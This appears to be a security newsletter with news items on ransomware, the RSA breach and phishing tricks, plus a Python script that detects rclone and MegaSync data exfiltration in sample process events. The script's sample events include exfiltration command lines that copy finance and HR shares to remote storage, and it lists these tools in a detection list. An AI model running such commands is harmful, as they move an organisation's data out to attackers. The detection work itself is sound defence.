Proactively Detect and Block These Exfiltration Applications
NetStandard’s Security Minute Series
In 2011, the IT world was shocked to learn that RSA was hacked, and the seed values for SecurID tokens were stolen. This left every SecurID token in the world vulnerable and exposed – if you were in the industry at the time, you surely remember this incident. Now, 10 years later, the NDAs have expired and the full story is out: The Full Story of the Stunning RSA Hack Can Finally Be Told | WIRED
- Spoiler alert: It began with a phishing email, containing a malicious Excel attachment titled “2011 Recruitment Plan.” It’s a trap!
Want to play with Microsoft 365 E5 in a sandbox, and really get hands-on with all of the advanced tools and functions? Get a free, renewable E5 developer subscription here (really!): Developer Program – Microsoft 365
The DarkSide ransomware gang, which was responsible for Colonial Pipeline, is believed to have made over $90 million in just nine months, based on transfers into its Bitcoin wallet. The average payment was $1.9 million: Darkside gang estimated to have made over $90 million from ransomware attacks | The Record by Recorded Future
In a ransomware incident, the attackers normally try to exfiltrate data out of the network first, so they can threaten to leak it if you don’t pay the ransom. Two tools commonly used for that exfiltration are Rclone and MegaSync. How to proactively detect and block these applications: Rclone Wars: Transferring leverage in a ransomware attack (redcanary.com)
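As an added illustration of the kind of proactive detection the item above points to (this is example code written for this newsletter, not Red Canary’s or NetStandard’s, and the Sysmon-style process-creation events are constructed): flag any process whose image is rclone or MegaSync, and also any process whose command line carries rclone’s transfer-verb plus `remote:path` syntax, which catches a renamed rclone binary too.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events (Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Users\alice\Downloads\rclone.exe",
     "cmdline": r'rclone.exe copy "C:\Finance" mega:backup --config C:\Users\alice\r.conf --transfers 8'},
    {"image": r"C:\Windows\Temp\svchost.exe",          # renamed binary, rclone syntax
     "cmdline": r"svchost.exe sync D:\Shares\HR remote:exfil --no-check-certificate -P"},
    {"image": r"C:\Users\bob\AppData\Local\MEGAsync\MEGAsync.exe",
     "cmdline": r"MEGAsync.exe"},
    {"image": r"C:\Program Files\7-Zip\7z.exe",        # benign: no remote, no rclone verb
     "cmdline": r"7z.exe a archive.7z C:\Finance"},
]

# Image names the page calls out as exfiltration tooling.
KNOWN_IMAGES = {"rclone.exe", "megasync.exe"}

# rclone sub-commands that move data, and its "name:path" remote syntax.
# The remote name must be at least two letters so Windows drive letters (C:\...) do not match.
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.IGNORECASE)
RCLONE_REMOTE = re.compile(r"(?:^|\s)([A-Za-z][\w.-]+):(?=\S|$)")


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like rclone/MegaSync activity; empty list if none."""
    reasons: List[str] = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    if image in KNOWN_IMAGES:
        reasons.append(f"known exfiltration tool image: {image}")
    verb, remote = RCLONE_VERB.search(cmd), RCLONE_REMOTE.search(cmd)
    if verb and remote:  # transfer verb AND a remote:path target => rclone-style transfer
        msg = f"rclone-style transfer '{verb.group(1).lower()}' to remote '{remote.group(1)}'"
        if image not in KNOWN_IMAGES:
            msg += " from an unrecognised binary (possible renamed rclone)"
        reasons.append(msg)
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (image, reasons) for every event that triggers at least one reason."""
    return [(e["image"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(f"ALERT {image}: {'; '.join(reasons)}")
```

In production the same logic belongs in your EDR or SIEM query, paired with a block rule for the image hashes and publisher, since a renamed binary defeats name-based blocking alone.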
CISA has published detailed technical guidance for how to evict an attacker from your network, once that attacker has breached Active Directory and/or Azure Active Directory. It includes a lot of good advice in general: Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise | CISA
On another note…
- It’s possible to remove the “External Sender” warnings from emails, by simply using CSS: Phishing Scammers Remove ‘External Sender’ Email Warnings Impersonating Internal Users (knowbe4.com)
- A new malware tactic is to pretend that it encrypted your files, without actually encrypting them: https://twitter.com/MsftSecIntel/status/1395138347601854465?s=20
- A week after insurance company AXA announced that it will stop providing insurance coverage for ransomware extortion payments, it was itself hit with the Avaddon ransomware: Insurer AXA hit by ransomware after dropping support for ransom payments (bleepingcomputer.com)